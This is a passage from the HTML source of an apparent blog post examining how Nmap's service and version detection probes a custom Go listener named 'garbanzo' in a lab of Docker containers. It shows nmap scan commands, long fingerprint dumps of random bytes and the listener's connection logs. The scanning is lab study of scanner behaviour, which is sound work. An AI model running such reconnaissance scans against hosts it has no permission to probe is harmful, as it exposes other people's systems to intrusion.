class="s2">ef</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">a14I</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2"> SF:d3</span><span class="se">\x</span><span class="s2">8am&gt;B</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span>%r<span class="o">(</span>Help,171,<span class="s2">"</span><span class="se">\[</span><span class="s2">2</span><span class="se">\x</span><span class="s2">f3MhR&amp;</span><span class="se">\x</span><span class="s2">fe&amp;%&lt;</span><span class="se">\^\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">a5vJ#</span><span class="se">\x</span><span class="s2">8d SF:&amp;</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">bbV</span><span class="se">\x</span><span class="s2">85</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">dfW</span><span class="se">\x</span><span class="s2">bbu</span><span class="se">\x</span><span class="s2">130</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">92</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">a99</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">85</span><span class="se">\x</span><span class="s2">dbs</span><span class="se">\"\x</span><span class="s2"> SF:dd</span><span class="se">\x</span><span class="s2">ca</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">d3</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">971</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">b6</span><span class="se">\x</span><span class="s2">aeH</span><span class="se">\x</span><span class="s2">cb</span><span class="se">\x</span><span class="s2">f0</span><span class="se">\x</span><span class="s2">d237</span><span class="se">\+\x</span><span class="s2">1 SF:2</span><span class="se">\x</span><span class="s2">de~</span><span class="se">\x</span><span class="s2">ca&amp;</span><span class="se">\x</span><span class="s2">a93</span><span class="se">\t\x</span><span class="s2">9b</span><span class="se">\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\]</span><span class="s2">wH</span><span class="se">\x</span><span class="s2">9c</span><span class="se">\x</span><span class="s2">07:</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">88oW</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">b9P</span><span class="se">\x</span><span class="s2">92O SF:</span><span class="sb">`</span><span class="se">\x</span>93-<span class="se">\x</span><span class="nb">fc</span><span class="se">\x</span>14<span class="se">\x</span>19<span class="se">\x</span>02<span class="se">\x</span>18x<span class="se">\x</span>d9I<span class="se">\x</span>1d<span class="se">\x</span>fb<span class="se">\x</span>bbp<span class="se">\x</span>d5d<span class="se">\x</span>0e4<span class="se">\x</span>c86<span class="se">\x</span>ab<span class="se">\x</span>d1<span class="se">\x</span>0 SF:e<span class="se">\x</span>8b&amp;<span class="se">\x</span>d1<span class="se">\x</span>fa<span class="se">\x</span>baX<span class="se">\x</span>c1<span class="se">\x</span>91<span class="se">\x</span>20<span class="se">\x</span>cb<span class="se">\x</span>0f8<span class="se">\x</span>c4Q<span class="se">\x</span>89<span class="se">\x</span>f2!<span class="se">\x</span>e8V<span class="se">\|</span>wj<span class="se">\x</span>eb<span class="se">\x</span>c3 SF:zk#<span class="sb">`</span><span class="se">\x</span><span class="s2">01A{</span><span class="se">\?\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">15</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">b2o</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\(\x</span><span class="s2">13G</span><span class="se">\x</span><span class="s2">b7#</span><span class="se">\x</span><span class="s2">95</span><span class="se">\x</span><span class="s2">15~</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">9d</span><span class="se">\</span><span class="s2"> SF:x8d</span><span class="se">\x</span><span class="s2">cf</span><span class="se">\]\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">bbg</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">eeC</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">11Y</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">b7</span><span class="se">\x</span><span class="s2">a0&gt;:</span><span class="sb">`</span><span class="se">\x</span>d9<span class="se">\0\x</span>85<span class="se">\x</span> SF:c5Zv<span class="se">\x</span>c8Qa<span class="sb">`</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\\\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">14rD</span><span class="se">\x</span><span class="s2">87</span><span class="se">\x</span><span class="s2">92{~</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">a5</span><span class="se">\x</span><span class="s2">06Z</span><span class="se">\</span><span class="s2"> SF:xe1</span><span class="se">\x</span><span class="s2">c4wi</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e3:</span><span class="se">\x</span><span class="s2">9ep</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">ea</span><span class="se">\x</span><span class="s2">05&gt;</span><span class="se">\x</span><span class="s2">c6p</span><span class="se">\[\x</span><span class="s2">7f,</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">ed</span><span class="se">\x</span><span class="s2">f5</span><span class="se">\x</span><span class="s2">a SF:6x</span><span class="se">\x</span><span class="s2">a80</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">058U</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">bd{</span><span class="se">\x</span><span class="s2">c3</span><span class="se">\x</span><span class="s2">9dk</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">c61</span><span class="se">\x</span><span class="s2">db&gt;r</span><span class="se">\\\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">e8K</span><span class="se">\x</span><span class="s2">a6l</span><span class="se">\</span><span class="s2"> SF:x9a}</span><span class="se">\x</span><span class="s2">d2F</span><span class="se">\x</span><span class="s2">1a</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">faZ</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span class="s2">91</span><span class="se">\|\x</span><span class="s2">1b</span><span class="se">\x</span><span class="s2">1b</span><span class="se">\x</span><span class="s2">8d!</span><span class="se">\x</span><span class="s2">fe</span><span class="se">\x</span><span class="s2">125</span><span class="se">\0\]\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">88G SF:</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\"\x</span><span class="s2">c1</span><span class="se">\"</span><span class="s2">a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">d4V</span><span class="se">\(</span><span class="s2">L:</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">87</span><span class="se">\x</span><span class="s2">cb</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">fb</span><span class="se">\x</span><span class="s2">fc</span><span class="se">\</span><span class="s2"> SF:xc6c</span><span class="se">\x</span><span class="s2">e4Nz</span><span class="se">\x</span><span class="s2">0eb</span><span class="se">\x</span><span class="s2">94</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">9d</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">94k9@y</span><span class="se">\x</span><span class="s2">82</span><span class="se">\x</span><span class="s2">8a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">03 SF:</span><span class="se">\x</span><span class="s2">f5hs@q</span><span class="se">\x</span><span class="s2">d9n</span><span class="se">\x</span><span class="s2">f8</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">15~</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">b7</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">a5</span><span class="se">\x</span><span class="s2">dfGU@</span><span class="se">\x</span><span class="s2">deJ</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">94p</span><span class="se">\x</span><span class="s2">e2 SF:</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">e6!</span><span class="se">\x</span><span class="s2">f8</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">c0s</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span><span class="p">;</span> MAC Address: 02:42:AC:11:00:02 <span class="o">(</span>Unknown<span class="o">)</span> Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>87.86 seconds </code></pre> </div> <p>The above output shows us that NMAP was able to detect that port 80 was indeed open but could not verify the service and version, which makes sense and we'll dig into why a bit later in this post.</p> <h3> NMAP Service and Version Detection and Scan Intensity </h3> <p>NMAP has useful functionality to adjust how "intensely" it scans the target according to its documentation[2]. If we look at the flag "--version-intensity" which we haven't used directly yet, we can see in the docs[2] that the flag "-sV" sets "--version-intensity" to 7 by default. Lets now go ahead and change ""--version-intensity" and observe how NMAP behaves:</p> <p>First setup our tool<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@78b5ecfeb870:/work# <span class="nb">export </span><span class="nv">PORT</span><span class="o">=</span>80 root@78b5ecfeb870:/work# <span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>nmap root@78b5ecfeb870:/work# go build <span class="nt">-o</span> garbanzo <span class="o">&amp;&amp;</span> ./garbanzo 2020/06/10 12:02:40 <span class="nv">$GARBANZO_WEB</span> must be <span class="nb">set </span>2020/06/10 12:02:40 <span class="nv">$GARBANZO_HOST</span> must be <span class="nb">set </span>2020/06/10 12:02:40 <span class="o">[</span>+] Initialised Listener on Port: 80 </code></pre> </div> <p>Execute NMAP:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@f5f84eb31bc0:/go# nmap <span class="nt">-sT</span> <span class="nt">-sV</span> 172.17.0.2 <span class="nt">-p</span> 80 <span class="nt">--version-intensity</span> 1 </code></pre> </div> <p>Below we get the following tool output from the NMAP command above:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] <span class="o">[</span>e76bfa77f3047f2162bf0ca697d24cd38be99ecf96960ca5f324c33801babcd3] Port:80 Connection:1 from:172.17.0.3:51270 <span class="o">[</span>ERROR] <span class="o">[</span>e76bfa77f3047f2162bf0ca697d24cd38be99ecf96960ca5f324c33801babcd3] <span class="nb">read </span>tcp4 172.17.0.2:80-&gt;172.17.0.3:51270: <span class="nb">read</span>: connection reset by peer <span class="o">[</span>+] <span class="o">[</span>ca32700fb09ad58490ab340fd19d5bfd17a77f5a4b39357341e93ec0ee868721] Port:80 Connection:2 from:172.17.0.3:51272 <span class="o">[</span>+] <span class="o">[</span>6b991cc7ea35a78d63af16555c5b404b78a74c62eede3acaed6f5cda6a650e66] Port:80 Connection:3 from:172.17.0.3:51274 <span class="o">[</span>+] <span class="o">[</span>343b98c09fefc41ecb2e0eb48c918ed8f5b1d0af02dc05b781abb5a4d57e7e7a] Port:80 Connection:4 from:172.17.0.3:51276 <span class="o">[</span>+] <span class="o">[</span>61c11e4bfa44083c4ac764fbbe1546e4a70d38434b4d39fd287cbc26bd1631dd] Port:80 Connection:5 from:172.17.0.3:51278 <span class="o">[</span>+] <span class="o">[</span>0958fca1885269f9797a039aedcbccc67d5153f71f5396ffee23dc707d714a8c] Port:80 Connection:6 from:172.17.0.3:51280 <span class="o">[</span>+] <span class="o">[</span>322a686505032b68a7903a68b98ec502f87710d7ed60cd71bc5d6708fe214af0] Port:80 Connection:7 from:172.17.0.3:51282 <span class="o">[</span>+] <span class="o">[</span>610f9f80d0b616267fb567fbe5b437653fd3d3ac3d524ca92baac642d599e102] Port:80 Connection:8 from:172.17.0.3:51284 <span class="o">[</span>+] <span class="o">[</span>12f40d18ad44fee3eef5371c571883efcac00b7576dcee35ebb8fd12af37571f] Port:80 Connection:9 from:172.17.0.3:51286 </code></pre> </div> <p>The above output from the tool shows us that NMAP continues the behaviour of checking if port 80 is open by connecting and resetting. We can also see that 9 connections were made but no "nmap" terms were identified. If we run the NMAP command several times with "--version-intensity" set to "1", we will see the above pattern repeated, first a connection and reset which is then followed by 8 probes.</p> <p>Below is the associate NMAP output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@f5f84eb31bc0:/go# nmap <span class="nt">-sT</span> <span class="nt">-sV</span> 172.17.0.2 <span class="nt">-p</span> 80 <span class="nt">--version-intensity</span> 1 Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-002-02 UTC Nmap scan report <span class="k">for </span>172.17.0.2 Host is up <span class="o">(</span>0.000083s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 80/tcp open http? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V<span class="o">=</span>7.70%I<span class="o">=</span>1%D<span class="o">=</span>6/11%Time<span class="o">=</span>5EE23E9F%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetR SF:equest,270,<span class="s2">"</span><span class="se">\x</span><span class="s2">b5rHF</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">15Y</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">1f</span><span class="se">\x</span><span class="s2">9a</span><span class="se">\0\x</span><span class="s2">e64 SF:xrB</span><span class="se">\x</span><span class="s2">b4</span><span class="se">\x</span><span class="s2">9a</span><span class="se">\x</span><span class="s2">cd#S:W</span><span class="se">\x</span><span class="s2">01</span><span class="se">\|</span><span class="s2">K</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">1ft</span><span class="se">\x</span><span class="s2">95</span><span class="se">\x</span><span class="s2">90</span><span class="se">\n\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">004k</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">99 SF:</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">88s</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">13</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">f1Gp-</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">d6</span><span class="se">\x</span><span class="s2">f2e</span><span class="se">\x</span><span class="s2">94</span><span class="se">\x</span><span class="s2">b2Z</span><span class="se">\r\x</span><span class="s2">94C</span><span class="se">\x</span><span class="s2">07EY SF:</span><span class="se">\?</span><span class="s2">&gt;</span><span class="se">\\</span><span class="s2">8D</span><span class="se">\x</span><span class="s2">ear</span><span class="se">\x</span><span class="s2">a0y</span><span class="se">\x</span><span class="s2">ae</span><span class="se">\x</span><span class="s2">f3</span><span class="se">\x</span><span class="s2">86</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">ab&lt;</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">c6C</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">f1IMw</span><span class="se">\x</span><span class="s2">0b-</span><span class="se">\x</span><span class="s2">b6</span><span class="se">\x</span><span class="s2">ce SF:</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">9b</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">15S</span><span class="se">\x</span><span class="s2">dd</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\$\.\x</span><span class="s2">9e</span><span class="se">\x</span><span class="s2">e4</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">965</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">ee</span><span class="sb">`</span><span class="se">\x</span>e2<span class="se">\x</span>04<span class="se">\x</span>95 SF:<span class="se">\x</span>1b<span class="se">\x</span>c0<span class="se">\x</span>e5-<span class="se">\x</span>ceM<span class="se">\x</span>e9<span class="se">\x</span>97<span class="se">\x</span>bcd<span class="se">\x</span>ea<span class="se">\x</span>c2<span class="se">\x</span>ed<span class="se">\n\x</span>03<span class="se">\t</span>U<span class="se">\x</span>97<span class="se">\x</span>01<span class="se">\x</span>be<span class="se">\x</span>af<span class="se">\x</span>0 SF:2<span class="se">\x</span>ce-SH<span class="se">\x</span>faZ<span class="se">\x</span>deV<span class="se">\x</span>c7#<span class="se">\x</span>d9W<span class="se">\x</span>f0X~1-Es<span class="se">\x</span>b4<span class="se">\x</span>f6<span class="se">\x</span>e2<span class="se">\x</span>cf<span class="se">\x</span>07<span class="se">\x</span>a5<span class="se">\*</span>m<span class="se">\x</span>e5i<span class="se">\</span> SF:^<span class="se">\x</span>88<span class="se">\x</span>03d<span class="se">\x</span>f7<span class="se">\x</span>e1<span class="se">\x</span>05<span class="se">\x</span>12<span class="se">\x</span>90<span class="se">\r</span>N<span class="se">\x</span>84<span class="se">\x</span>17<span class="se">\x</span>ed<span class="se">\]\x</span>1a<span class="se">\x</span>f0n<span class="se">\x</span>bc<span class="se">\x</span>eb<span class="se">\x</span>e9<span class="se">\x</span>d SF:bTp<span class="se">\x</span>e5#K<span class="se">\x</span>d8<span class="se">\|\x</span>8c<span class="se">\x</span>d2<span class="se">\x</span>18<span class="o">}</span><span class="se">\x</span>e9<span class="se">\x</span>da<span class="se">\x</span>bczz<span class="se">\x</span>07<span class="se">\x</span>9b<span class="se">\x</span>81<span class="se">\x</span>a1<span class="se">\x</span>bb<span class="se">\x</span>9c<span class="se">\x</span>e1<span class="se">\</span> SF:x19x<span class="se">\x</span>0f<span class="se">\x</span>9a8<span class="se">\x</span>94<span class="se">\x</span>012<span class="se">\x</span>f0<span class="se">\x</span>9bm<span class="se">\x</span>e3<span class="se">\x</span>97<span class="se">\x</span>f3<span class="se">\x</span>e0<span class="se">\r\x</span>abbK<span class="se">\x</span>a6<span class="se">\x</span>82<span class="se">\x</span>13<span class="se">\x</span>7f SF:<span class="se">\x</span>bc<span class="se">\x</span>dc<span class="se">\x</span>19<span class="se">\x</span>1f<span class="se">\x</span>93<span class="se">\x</span>20<span class="se">\x</span>0e<span class="se">\x</span>b0<span class="se">\x</span>c8<span class="se">\x</span>85<span class="se">\x</span>bfK<span class="se">\x</span>b1<span class="se">\x</span>f1<span class="se">\x</span>db<span class="se">\x</span>18G<span class="se">\n\x</span>f5<span class="se">\x</span>1 SF:d-<span class="se">\x</span>b7<span class="se">\x</span>ca<span class="se">\x</span>9c<span class="se">\x</span>bb,<span class="se">\x</span>0b<span class="se">\x</span>8c<span class="se">\x</span>b6<span class="se">\x</span>f7<span class="se">\x</span>125<span class="se">\x</span>17<span class="se">\x</span>81A<span class="se">\"\x</span>b9j<span class="se">\n\x</span>bb8<span class="se">\x</span>b6Y<span class="se">\x</span>9 SF:e<span class="se">\x</span>98<span class="se">\x</span>ce<span class="se">\x</span>1f<span class="se">\x</span>1c<span class="se">\x</span>da<span class="se">\x</span>91<span class="se">\x</span>e4<span class="se">\x</span>fcb<span class="se">\x</span>88<span class="se">\x</span>94<span class="se">\x</span>b2<span class="se">\x</span><span class="nb">dd</span><span class="se">\x</span>20<span class="se">\x</span>1e1<span class="se">\x</span>95<span class="se">\x</span>dcH<span class="se">\x</span>1 SF:5<span class="se">\*\x</span>9c<span class="se">\x</span>9b<span class="se">\x</span>ac<span class="se">\x</span>19<span class="se">\x</span>b9A<span class="se">\x</span>8at@j%<span class="se">\)\x</span>e0<span class="se">\.</span>p<span class="se">\x</span>1bI<span class="se">\x</span>1bi<span class="se">\x</span>bdu<span class="se">\x</span>0c<span class="se">\x</span>ed5<span class="se">\x</span>10<span class="se">\x</span> SF:d7<span class="se">\n</span>pfJ<span class="se">\x</span>be<span class="se">\x</span>8c<span class="se">\x</span>f1<span class="se">\.\x</span>d6l<span class="se">\x</span>13<span class="se">\x</span>d1p<span class="se">\x</span>01<span class="se">\x</span>b6&lt;z<span class="se">\x</span>c7<span class="se">\x</span>e5<span class="se">\x</span>aa<span class="se">\x</span><span class="nv">f6</span><span class="o">=</span>0<span class="se">\x</span>8f<span class="se">\x</span>c1 SF:<span class="se">\x</span>c8<span class="se">\"\x</span>90<span class="se">\x</span>bf<span class="se">\x</span>e9<span class="se">\x</span>c7<span class="se">\x</span>99<span class="se">\x</span>8d<span class="se">\x</span>eaz<span class="se">\x</span>e8<span class="se">\x</span>17<span class="se">\)\x</span>db<span class="o">{</span><span class="se">\x</span>84<span class="se">\x</span>e0C<span class="se">\x</span>e34<span class="se">\)\x</span>cc<span class="se">\</span> SF:x20U<span class="se">\x</span>0c<span class="se">\x</span>d2Cj<span class="se">\x</span>f9<span class="se">\x</span>fec<span class="o">}</span><span class="se">\x</span>a0<span class="se">\x</span>c5<span class="se">\x</span>03C@<span class="se">\x</span>9aG5<span class="se">\x</span>f8<span class="se">\x</span>ee<span class="se">\x</span>9c<span class="se">\t\x</span><span class="nb">fc</span><span class="se">\x</span>b4<span class="se">\x</span>7f<span class="se">\</span> SF:x10<span class="se">\x</span>b4<span class="se">\x</span>b8<span class="se">\x</span>ee<span class="se">\x</span>ca-<span class="se">\x</span>a0<span class="se">\x</span>bc<span class="se">\[\x</span>c7<span class="se">\x</span>f7<span class="se">\x</span>bf<span class="se">\x</span>ad<span class="se">\x</span>89<span class="se">\x</span>d7<span class="se">\x</span>93<span class="se">\x</span>b0<span class="se">\x</span>d8<span class="se">\x</span>c3<span class="se">\</span> SF:?<span class="se">\x</span>b4:<span class="se">\x</span>f7<span class="o">}</span>,<span class="se">\x</span>d6<span class="se">\x</span>11<span class="se">\x</span>12<span class="se">\x</span>c1<span class="se">\x</span>8f<span class="se">\(</span>tHH<span class="o">{</span>@<span class="se">\x</span>cb<span class="se">\x</span>fa0_<span class="se">\x</span>f3<span class="se">\x</span>e0<span class="se">\x</span>95S<span class="se">\x</span>cct<span class="se">\x</span>bd SF:<span class="se">\^\t\x</span>d3T<span class="se">\x</span>a9t<span class="se">\x</span><span class="nb">cd</span><span class="se">\x</span>b2<span class="se">\.\x</span>15<span class="se">\x</span>96<span class="se">\x</span>12<span class="se">\x</span>faFe<span class="se">\x</span>ac<span class="se">\x</span>cb<span class="se">\x</span>14<span class="se">\x</span>9e<span class="se">\x</span>caO<span class="se">\x</span>b2W<span class="se">\x</span>e SF:f<span class="se">\x</span>f3<span class="se">\x</span>d4O<span class="se">\)\x</span>e2<span class="se">\x</span>e7<span class="se">\x</span>d6<span class="se">\x</span>bbx<span class="se">\x</span>a1<span class="se">\x</span>c2<span class="se">\x</span>087#<span class="se">\x</span>b5<span class="se">\x</span>b2<span class="p">;</span><span class="se">\x</span>0f<span class="se">\x</span>cdL<span class="se">\x</span>e3<span class="sb">`</span><span class="se">\x</span><span class="s2">f4x SF:H!</span><span class="se">\x</span><span class="s2">b7</span><span class="se">\x</span><span class="s2">d0M</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\r\x</span><span class="s2">f2</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">c9h;ge</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\n</span><span class="s2">y</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">13X,X</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">f9 SF:x</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">15</span><span class="se">\[\x</span><span class="s2">93D</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">86</span><span class="se">\x</span><span class="s2">f4Z</span><span class="se">\x</span><span class="s2">8d7EiZt</span><span class="se">\x</span><span class="s2">91</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">a9K</span><span class="se">\x</span><span class="s2">1e!</span><span class="se">\x</span><span class="s2">ab</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">0 SF:1</span><span class="se">\x</span><span class="s2">95</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">de</span><span class="se">\r</span><span class="s2">U</span><span class="se">\x</span><span class="s2">d0!</span><span class="se">\x</span><span class="s2">93B</span><span class="se">\x</span><span class="s2">b1;</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">19G</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">9eDY</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">c0W</span><span class="se">\x</span><span class="s2">da SF:H</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">db0</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2">a3</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">fdS</span><span class="se">\x</span><span class="s2">bap</span><span class="se">\x</span><span class="s2">88</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">ed</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">ecZ</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">fc</span><span class="se">\x</span><span class="s2">bd</span><span class="se">\x</span><span class="s2"> SF:d6</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\n\x</span><span class="s2">86OyQ</span><span class="se">\x</span><span class="s2">1a</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">9c</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">c6</span><span class="se">\x</span><span class="s2">baCU</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\^\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">fd SF:</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">86</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions,150,<span class="s2">"</span><span class="se">\$\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">0e</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">a4</span><span class="se">\x</span><span class="s2">f SF:1</span><span class="se">\x</span><span class="s2">beS</span><span class="se">\x</span><span class="s2">85</span><span class="se">\^</span><span class="s2">~</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">0f:</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">1f</span><span class="se">\[\x</span><span class="s2">c2</span><span class="se">\x</span><span class="s2">dd9</span><span class="se">\x</span><span class="s2">e5</span><span class="se">\x</span><span class="s2">97</span><span class="se">\x</span><span class="s2">c6&lt;</span><span class="se">\0\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">b4-</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2"> SF:a9</span><span class="se">\x</span><span class="s2">deI</span><span class="se">\\\x</span><span class="s2">8f&gt;</span><span class="se">\x</span><span class="s2">ee</span><span class="se">\|\x</span><span class="s2">ab</span><span class="se">\x</span><span 